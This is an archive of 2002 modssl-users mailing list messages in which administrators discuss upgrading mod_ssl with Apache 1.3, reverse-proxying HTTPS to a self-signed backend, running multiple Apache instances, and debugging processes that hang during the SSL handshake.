	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5OFW6g23683
	for ; Mon, 24 Jun 2002 11:32:06 -0400
Date: Mon, 24 Jun 2002 11:32:06 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Upgrade ?
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 24 Jun 2002, RON MCKEEVER wrote:

> Im a little confused on how to upgrade my current mod_ssl-2.8.7-1.3.23, to
> mod_ssl-2.8.10-1.3.26.
> When I untar the new apache1.3.26 it is in it own dir.. So how do I upgrade
> 1.3.23? When I run the configure statement in the mod_ssl-2.8.10 dir I cant
> state --with-apache="1.3.23", I need to state the new apache dir, right??

Right... you give mod_ssl-2.8.10 the Apache 1.3.26 *source* directory for
its --with-apache= argument.  Then when you configure apache, tell it to
*install* to the same location that 1.3.23 is currently installed using
--prefix= (eg /usr/local/apache) and use the same directory structure
(using --with-layout= ) that you used before, if any.  Then when you run
'make install' from the Apache 1.3.26 source directory, it will overwrite
your 1.3.23 installation.

That should be it.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 17:54:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA06326; Mon, 24 Jun 2002 17:54:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from slrsdc18.dmz.standardlife.com id RAA06246; Mon, 24 Jun 2002 17:52:45 +0200 (MET DST)
From: michael_pacey@standardlife.com
Received: from SLUKEM01.internal.standardlife.com (slukem01.standardlife.com [172.31.113.108])
	by slrsdc18.dmz.standardlife.com (Pro-8.9.3/Pro-8.9.3) with ESMTP id QAA48874
	for ; Mon, 24 Jun 2002 16:44:38 +0100
Received: from slukdcn4.internal.standardlife.com (slukdcn4.standardlife.com [172.31.113.107])
	by SLUKEM01.internal.standardlife.com (4.6.1.91) with ESMTP id 
	for ; Mon, 24 Jun 2002 16:40:13 +0100
Subject: RE: Reverse proxying of SSL traffic
To: 
X-Mailer: Lotus Notes Release 5.0.2c (Intl) 2 February 2000
Message-ID: 
Date: Mon, 24 Jun 2002 16:44:28 +0100
X-MIMETrack: Serialize by Router on SLUKDCN4/STANDARD LIFE ASSURANCE COMPANY(Release 5.0.5
 |September 22, 2000) at 24/06/2002 16:38:18
MIME-Version: 1.0 (Generated by Clearswift ES version 4.6.1.121)
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA06280
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: michael_pacey@standardlife.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Yep, I did that and port 80 works like a dream.

When you say:

>Then, set up a virtual server on port 443 with the same proxy stuff.
>You reference the certificate file there.

this is the bit that bothers me.

Here's my virtual host:


        ServerName slrsdct1.internal.standardlife.com
        ErrorLog /oem/apache-mod_ssl/logs/error_log
        ProxyPass / https://webserver/
        ProxyPassReverse / https://webserver/
        SSLEngine On
        SSLCipherSuite ALL
        SSLCertificateFile /oem/apache-mod_ssl/conf/ssl/revproxy.crt
        SSLVerifyDepth 3
        SSLCertificateKeyFile /oem/apache-mod_ssl/conf/ssl/revproxy.key


I can make an SSL connection to this virtual host; the browser indicates
that encryption is in use.
The certificate/key that the reverse proxy is using is specified by the
SSLCertificateFile and SSLCertificateKeyFile directives.

The reverse proxy should now make an SSL connection to webserver (this is
running IBM HTTPServer, IBM's packaged Apache). webserver has it's own
self-signed certificate. I can make SSL connections to webserver with a
browser satisfactorily, but the browser alerts me that it doesn't trust the
certificate (because it's self-signed) and I have to click through.

I imagine that revproxy doesn't trust the certificate either, which is
causing the problem. Perhaps it's something else, but I am pretty sure I
need to tell revproxy about webserver's certificate within httpd.conf. I
can't find a suitable directive in the docs.

BTW this is Apache/1.3.24 with mod_ssl-2.8.8-1.3.24 on AIX 4.3.3

I have also been trying to do this with another proprietary product that
I'm not going to mention; it doesn't work (the supplier is working on a
fix) and I really don't like the software. I would love to prove that
Apache and mod_ssl are up to the job.

Many thanks in advance!

Michael



                                                                                                                 
                                            To:                                    
                    Sent by:                     cc:                                                             
                                                                                                       
                                                                                                                 
                                                                                                                 
                    24/06/2002 15:56                                                                             
                    Please respond to                                                                            
                    modssl-users                                                                                 
                                                                                                                 
                                                                                                                 



Set up two virtual servers for the same IP, one on port 80 (with just
simple
proxy rules).  Confirm this works.

Then, set up a virtual server on port 443 with the same proxy stuff.  You
reference the certificate file there.

Phil

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of
> michael_pacey@standardlife.com
> Sent: Monday, June 24, 2002 7:54 AM
> To: modssl-users@modssl.org
> Subject: Reverse proxying of SSL traffic
>
>
> Hi list,
>
> I have a requirement to set up a reverse proxy (web
> accelerator) which will
> accept incoming HTTP and HTTPS connections (using our
> Verisign credentials
> on the proxy) and proxy those requests to other web servers.
>
> The catch is I need the connection between the proxy and the
> web server to
> be HTTPS if and only if the incoming connection to the proxy
> is HTTPS. I
> will be using self-signed certificates on the web servers.
>
> Apache+mod_ssl looks like it can do this with
> ProxyPass/ProxyPassReverse
> but where do I reference the self signed certificate of the
> web server in
> httpd.conf?
>
> At the moment I get the following error in my browser when I
> try to use the
> reverse proxy:
>
> Proxy Error
> The proxy server received an invalid response from an upstream server.
>
>
> The proxy server could not handle the request GET /.
>
>
> Reason: SSL proxy connect failed
> (slrsdct1.internal.standardlife.com:443):
> peer 172.31.100.31:443: decryption failed or bad record mac
>
>
> Thanks in advance.
>
> Michael Pacey
>
>
>
> For more information on Standard Life, visit our website
> http://www.standardlife.com/
>
> The Standard Life Assurance Company, Standard Life House, 30
> Lothian Road,
> Edinburgh EH1 2DH, is registered in Scotland (No. SZ4) and
> regulated by the
> Financial Services Authority. Tel: 0131 225 2552 - calls may
> be recorded or
> monitored. This confidential e-mail is for the addressee
> only. If received
> in error, do not retain/copy/disclose it without our consent
> and please
> return it to us. We virus scan and monitor all e-mails but are not
> responsible for any damage caused by a virus or alteration by
> a third party
> after it is sent.
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org






For more information on Standard Life, visit our website
http://www.standardlife.com/

The Standard Life Assurance Company, Standard Life House, 30 Lothian Road,
Edinburgh EH1 2DH, is registered in Scotland (No. SZ4) and regulated by the
Financial Services Authority. Tel: 0131 225 2552 - calls may be recorded or
monitored. This confidential e-mail is for the addressee only. If received
in error, do not retain/copy/disclose it without our consent and please
return it to us. We virus scan and monitor all e-mails but are not
responsible for any damage caused by a virus or alteration by a third party
after it is sent.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 18:10:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA07245; Mon, 24 Jun 2002 18:08:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id SAA07219; Mon, 24 Jun 2002 18:08:21 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GY7WTI00.P6N for ; Mon, 24 Jun 2002
          17:08:06 +0100 
Message-ID: <3D1743E5.5090206@itaction.co.uk>
Date: Mon, 24 Jun 2002 17:08:05 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Two copies of Apache running on the same server...
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

you can run as many instances of apache that your system can support so 
long as no two instances listen on the same port - at least thats the 
theory.
In practice, apache writes to various files such as the .pid file, 
lockfiles, mutex lockfiles etc - and it can be difficult to make sure 
the different instances dont run into each other. (and remembering this 
each time you compile a new version).

On the other hand, it's just not necessary usually to run multiple 
instances - one apache instance can server http and https on multiple 
ports at the same time using VirtualHost stanzas.

You've probably noticed that apache pre-forks several copies of itself, 
and its these children that handle connections in a parallel fashion and 
go some way to taking advantage of multiple CPU's, but it's not the 
absolute best possible - that would be if you were using solaris 
threads. As it happens Apache 2 is multi-threaded, yet still supports 
pre-forked children, so you can tune it up a lot better.

On the balance of things, I feel it would be harder to get good 
performance out of a system if you used two separate apaches, than if 
you worked on tuning it up with just one.

Yu, Ming wrote:

>I have a web environment that support both http and https on the same
>machine.  The machine is a powerful SParc 450 with a lot of memory and CPU
>power.  I am wondering if I can install copies of apache on the same
>machine, one runs http, and another runs https.  Will this improve the
>server performance?
>
>- Ming 
>- System Engineer 
>- APL
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 18:39:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA10549; Mon, 24 Jun 2002 18:38:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail id SAA10362; Mon, 24 Jun 2002 18:36:25 +0200 (MET DST)
Received: from [10.10.10.168] by mail
  (ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.80 (1.8.0.0)); Mon, 24 Jun 2002 12:36:22 -0400
From: "Philip Ravenscroft" 
To: 
Subject: RE: Reverse proxying of SSL traffic
Date: Mon, 24 Jun 2002 12:36:19 -0400
Message-ID: <000901c21b9d$452d3040$a80a0a0a@projectmw.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Philip Ravenscroft" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> The reverse proxy should now make an SSL connection to
> webserver (this is
> running IBM HTTPServer, IBM's packaged Apache). webserver has it's own
> self-signed certificate.

Out of the box, mod_proxy cannot negotiate secure connections, so it can't
connect to your backend server using https.  (I don't know if anyone has
gotten this to work, though).  This means that you should have the backend
proxy connect in the clear to your IBM server.

Usually this is done with the proxy in the DMZ and the other server behind
another firewall, so it is secure.

Phil



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 19:10:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA13010; Mon, 24 Jun 2002 19:09:52 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail3.aracnet.com id TAA12936; Mon, 24 Jun 2002 19:08:35 +0200 (MET DST)
Received: from shell1.aracnet.com (shell1.aracnet.com [216.99.193.21])
	by mail3.aracnet.com (8.12.3/8.12.1) with ESMTP id g5OH8T0H030671
	for ; Mon, 24 Jun 2002 10:08:29 -0700
Received: by shell1.aracnet.com (8.11.6)  id g5OH8UU19365; Mon, 24 Jun 2002 10:08:30 -0700
Date: Mon, 24 Jun 2002 10:08:30 -0700 (PDT)
From: Alex Kotov 
To: 
Subject: Re: hanging apache processes (1.3.29 + mod_ssl 2.8.9)
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Kotov 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi Cliff,

Thanks for your response.

I'm using

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

and 5 is definitely the file descriptor for the network connection.

Is there anything else I should check?

Thanks,
- Alex


On Mon, 24 Jun 2002, Cliff Woolley wrote:

> On Sun, 23 Jun 2002, Alex Kotov wrote:
>
> > After a while the server processes become stuck while waiting for
> > the data from a socket.
> > Running strace on a hung process produces
> > read(5,
> > for a long time, eventually followed by
> > read(5, 0x959d2d8, 11) = -1 ETIMEDOUT (Connection timed out)
>
> Are you sure that file descriptor 5 is the connection to the client?
>
> What SSLRandomSeed are you using?  This sounds like one of those
> /dev/random not-enough-entropy problems to me.
>
> --Cliff
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 19:18:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA13913; Mon, 24 Jun 2002 19:17:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from wlv.to.gd-es.com id TAA13878; Mon, 24 Jun 2002 19:16:30 +0200 (MET DST)
Received: from SPIELPLATZ.CATO.GD-AIS.COM (mcc@SPIELPLATZ.CATO.GD-AIS.COM [199.107.242.254])
	by wlv.to.gd-es.com (8.11.6/8.10.1) with ESMTP id g5OH9N024900
	for ; Mon, 24 Jun 2002 10:09:23 -0700 (PDT)
Date: Mon, 24 Jun 2002 10:09:23 -0700 (PDT)
From: Merton Campbell Crockett 
To: modssl-users@modssl.org
Subject: RE: Reverse proxying of SSL traffic
In-Reply-To: <000901c21b9d$452d3040$a80a0a0a@projectmw.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Merton Campbell Crockett 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 24 Jun 2002, Philip Ravenscroft wrote:

> > The reverse proxy should now make an SSL connection to
> > webserver (this is
> > running IBM HTTPServer, IBM's packaged Apache). webserver has it's own
> > self-signed certificate.
> 
> Out of the box, mod_proxy cannot negotiate secure connections, so it can't
> connect to your backend server using https.  (I don't know if anyone has
> gotten this to work, though).  This means that you should have the backend
> proxy connect in the clear to your IBM server.

Normally, one uses mod_rwrite on the exposed server to communicate with an
internal reverse proxy or the actual content server.  The content returned
by the internal server can be returned using mod_proxy.

Ralph Engelshall wrote a paper on mod_rewrite in the late Nineties that
has a lot of detail on the function and use of this module.  Reading the
paper is time well spent.

    Nothing up this sleave. ... Ooh! I don't know my own strength!
						Bullwinkle J Moose

Merton Campbell Crockett


-- 
BEGIN:				vcard
VERSION:			3.0
FN:				Merton Campbell Crockett
ORG:				General Dynamics Advanced Information Systems;
				Intelligence Solutions
N:				Crockett;Merton;Campbell
EMAIL;TYPE=internet:		mcc@CATO.GD-AIS.COM
TEL;TYPE=work,voice,msg,pref:	+1(805)497-5045
TEL;TYPE=pager,msg:		+1(877)528-0049
TEL;TYPE=fax,work:		+1(805)497-5050
TEL;TYPE=cell,voice,msg:	+1(805)377-6762
END:				vcard

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 19:26:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA14398; Mon, 24 Jun 2002 19:25:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail-relay1.sift.co.uk id TAA14344; Mon, 24 Jun 2002 19:24:13 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail-relay1.sift.co.uk (Postfix) with ESMTP id 9C7EB5674A
	for ; Mon, 24 Jun 2002 18:24:12 +0100 (BST)
Received: from sift.co.uk (sleazy.office.sift.co.uk [172.17.64.10])
	by mail-relay1.sift.co.uk (Postfix) with ESMTP id E095A56747
	for ; Mon, 24 Jun 2002 18:24:10 +0100 (BST)
Message-ID: <3D1755BA.3060203@sift.co.uk>
Date: Mon, 24 Jun 2002 18:24:10 +0100
From: Andy Osborne 
Organization: Sift Group
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:0.9.4) Gecko/20011019 Netscape6/6.2
X-Accept-Language: en-gb, en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: hanging apache processes (1.3.29 + mod_ssl 2.8.9)
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by AMaViS 0.3.12pre8
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andy Osborne 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've seen this happen sometimes on our SSL servers (which do
quite a lot of traffic).  A quick search of the logs for
recent connections from the same address always shows the
client as IE5.0 - which is known to be broken.  The connections
seem to stall in the SSL negotiation and get killed off
but our rather intolerant tcp keepalive settings.  I've never
found a real answer to the problem.

Andy

Alex Kotov wrote:

> Hi Cliff,
> 
> Thanks for your response.
> 
> I'm using
> 
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> 
> and 5 is definitely the file descriptor for the network connection.
> 
> Is there anything else I should check?
> 
> Thanks,
> - Alex
> 
> 
> On Mon, 24 Jun 2002, Cliff Woolley wrote:
> 
> 
>>On Sun, 23 Jun 2002, Alex Kotov wrote:
>>
>>
>>>After a while the server processes become stuck while waiting for
>>>the data from a socket.
>>>Running strace on a hung process produces
>>>read(5,
>>>for a long time, eventually followed by
>>>read(5, 0x959d2d8, 11) = -1 ETIMEDOUT (Connection timed out)
>>>
>>Are you sure that file descriptor 5 is the connection to the client?
>>
>>What SSLRandomSeed are you using?  This sounds like one of those
>>/dev/random not-enough-entropy problems to me.
>>
>>--Cliff
>>
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 


-- 
Andy Osborne      ****************      "Vertical B2B Communities"
Senior Internet Engineer
Sift Group                    100 Victoria Street, Bristol BS1 6HZ
tel:+44 117 915 9600  fax:+44 117 915 9630   http://www.sift.co.uk

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 20:20:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA18423; Mon, 24 Jun 2002 20:20:00 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail3.aracnet.com id UAA18281; Mon, 24 Jun 2002 20:18:28 +0200 (MET DST)
Received: from shell1.aracnet.com (shell1.aracnet.com [216.99.193.21])
	by mail3.aracnet.com (8.12.3/8.12.1) with ESMTP id g5OIIOEJ014921
	for ; Mon, 24 Jun 2002 11:18:24 -0700
Received: by shell1.aracnet.com (8.11.6)  id g5OIIPU23229; Mon, 24 Jun 2002 11:18:25 -0700
Date: Mon, 24 Jun 2002 11:18:25 -0700 (PDT)
From: Alex Kotov 
To: 
Subject: Re: hanging apache processes (1.3.29 + mod_ssl 2.8.9)
In-Reply-To: <3D1755BA.3060203@sift.co.uk>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Kotov 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I've seen strange problems with IE5, too, but these connections have
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)" as
User-Agent. Unfortunately, changing tcp keepalive setting is not an
option for us.

I don't know all the intricacies of SSL handshake, but it looks like it
starts by the server trying to read 11 bytes from the client, and this is
where mod_ssl may wait for a long time without checking for a timeout.
Could someone point me to the place in the code where this read happens? I
would hate to switch to stronghold :(

Thanks,
- Alex


On Mon, 24 Jun 2002, Andy Osborne wrote:

> I've seen this happen sometimes on our SSL servers (which do
> quite a lot of traffic).  A quick search of the logs for
> recent connections from the same address always shows the
> client as IE5.0 - which is known to be broken.  The connections
> seem to stall in the SSL negotiation and get killed off
> but our rather intolerant tcp keepalive settings.  I've never
> found a real answer to the problem.
>
> Andy
>
> Alex Kotov wrote:
>
> > Hi Cliff,
> >
> > Thanks for your response.
> >
> > I'm using
> >
> > SSLRandomSeed startup builtin
> > SSLRandomSeed connect builtin
> >
> > and 5 is definitely the file descriptor for the network connection.
> >
> > Is there anything else I should check?
> >
> > Thanks,
> > - Alex
> >
> >
> > On Mon, 24 Jun 2002, Cliff Woolley wrote:
> >
> >
> >>On Sun, 23 Jun 2002, Alex Kotov wrote:
> >>
> >>
> >>>After a while the server processes become stuck while waiting for
> >>>the data from a socket.
> >>>Running strace on a hung process produces
> >>>read(5,
> >>>for a long time, eventually followed by
> >>>read(5, 0x959d2d8, 11) = -1 ETIMEDOUT (Connection timed out)
> >>>
> >>Are you sure that file descriptor 5 is the connection to the client?
> >>
> >>What SSLRandomSeed are you using?  This sounds like one of those
> >>/dev/random not-enough-entropy problems to me.
> >>
> >>--Cliff
> >>
> >>
> >>______________________________________________________________________
> >>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >>User Support Mailing List                      modssl-users@modssl.org
> >>Automated List Manager                            majordomo@modssl.org
> >>
> >>
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> >
>
>
> --
> Andy Osborne      ****************      "Vertical B2B Communities"
> Senior Internet Engineer
> Sift Group                    100 Victoria Street, Bristol BS1 6HZ
> tel:+44 117 915 9600  fax:+44 117 915 9630   http://www.sift.co.uk
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 20:38:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA19468; Mon, 24 Jun 2002 20:37:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id UAA19403; Mon, 24 Jun 2002 20:36:57 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GY83PK00.F7B for ; Mon, 24 Jun 2002
          19:36:56 +0100 
Message-ID: <3D1766C7.3000405@itaction.co.uk>
Date: Mon, 24 Jun 2002 19:36:55 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: hanging apache processes (1.3.29 + mod_ssl 2.8.9)
References: 
Content-Type: multipart/alternative;
 boundary="------------000004010906080203070307"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------000004010906080203070307
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Perhaps if you watch the session with Eric Rescorla's excellent ssldump 
tool you may get to the bottom of it....

http://www.rtfm.com/ssldump/

Or another possibility altogether... I had a problem which looked 
similar to this which was some solaris specific mutex bug which meant 
that child processes did not get released properly after certain types 
of SSL connections - this was fixed only with rev 1.3.24, and also by 
adding 'AcceptMutex pthread' to the config file.

Alex Kotov wrote:

>I've seen strange problems with IE5, too, but these connections have
>"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)" as
>User-Agent. Unfortunately, changing tcp keepalive setting is not an
>option for us.
>
>I don't know all the intricacies of SSL handshake, but it looks like it
>starts by the server trying to read 11 bytes from the client, and this is
>where mod_ssl may wait for a long time without checking for a timeout.
>Could someone point me to the place in the code where this read happens? I
>would hate to switch to stronghold :(
>
>Thanks,
>- Alex
>
>
>On Mon, 24 Jun 2002, Andy Osborne wrote:
>
>  
>
>>I've seen this happen sometimes on our SSL servers (which do
>>quite a lot of traffic).  A quick search of the logs for
>>recent connections from the same address always shows the
>>client as IE5.0 - which is known to be broken.  The connections
>>seem to stall in the SSL negotiation and get killed off
>>but our rather intolerant tcp keepalive settings.  I've never
>>found a real answer to the problem.
>>
>>Andy
>>
>>Alex Kotov wrote:
>>
>>    
>>
>>>Hi Cliff,
>>>
>>>Thanks for your response.
>>>
>>>I'm using
>>>
>>>SSLRandomSeed startup builtin
>>>SSLRandomSeed connect builtin
>>>
>>>and 5 is definitely the file descriptor for the network connection.
>>>
>>>Is there anything else I should check?
>>>
>>>Thanks,
>>>- Alex
>>>
>>>
>>>On Mon, 24 Jun 2002, Cliff Woolley wrote:
>>>
>>>
>>>      
>>>
>>>>On Sun, 23 Jun 2002, Alex Kotov wrote:
>>>>
>>>>
>>>>        
>>>>
>>>>>After a while the server processes become stuck while waiting for
>>>>>the data from a socket.
>>>>>Running strace on a hung process produces
>>>>>read(5,
>>>>>for a long time, eventually followed by
>>>>>read(5, 0x959d2d8, 11) = -1 ETIMEDOUT (Connection timed out)
>>>>>
>>>>>          
>>>>>
>>>>Are you sure that file descriptor 5 is the connection to the client?
>>>>
>>>>What SSLRandomSeed are you using?  This sounds like one of those
>>>>/dev/random not-enough-entropy problems to me.
>>>>
>>>>--Cliff
>>>>
>>>>
>>>>______________________________________________________________________
>>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>>User Support Mailing List                      modssl-users@modssl.org
>>>>Automated List Manager                            majordomo@modssl.org
>>>>
>>>>
>>>>        
>>>>
>>>______________________________________________________________________
>>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>>User Support Mailing List                      modssl-users@modssl.org
>>>Automated List Manager                            majordomo@modssl.org
>>>
>>>
>>>      
>>>
>>--
>>Andy Osborne      ****************      "Vertical B2B Communities"
>>Senior Internet Engineer
>>Sift Group                    100 Victoria Street, Bristol BS1 6HZ
>>tel:+44 117 915 9600  fax:+44 117 915 9630   http://www.sift.co.uk
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>    
>>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


--------------000004010906080203070307
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit




  
  


Perhaps if you watch the session with Eric Rescorla's excellent ssldump tool
you may get to the bottom of it....



http://www.rtfm.com/ssldump/



Or another possibility altogether... I had a problem which looked similar
to this which was some solaris specific mutex bug which meant that child
processes did not get released properly after certain types of SSL connections
- this was fixed only with rev 1.3.24, and also by adding 'AcceptMutex pthread'
to the config file.



Alex Kotov wrote:



  
I've seen strange problems with IE5, too, but these connections have
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)" as
User-Agent. Unfortunately, changing tcp keepalive setting is not an
option for us.

I don't know all the intricacies of SSL handshake, but it looks like it
starts by the server trying to read 11 bytes from the client, and this is
where mod_ssl may wait for a long time without checking for a timeout.
Could someone point me to the place in the code where this read happens? I
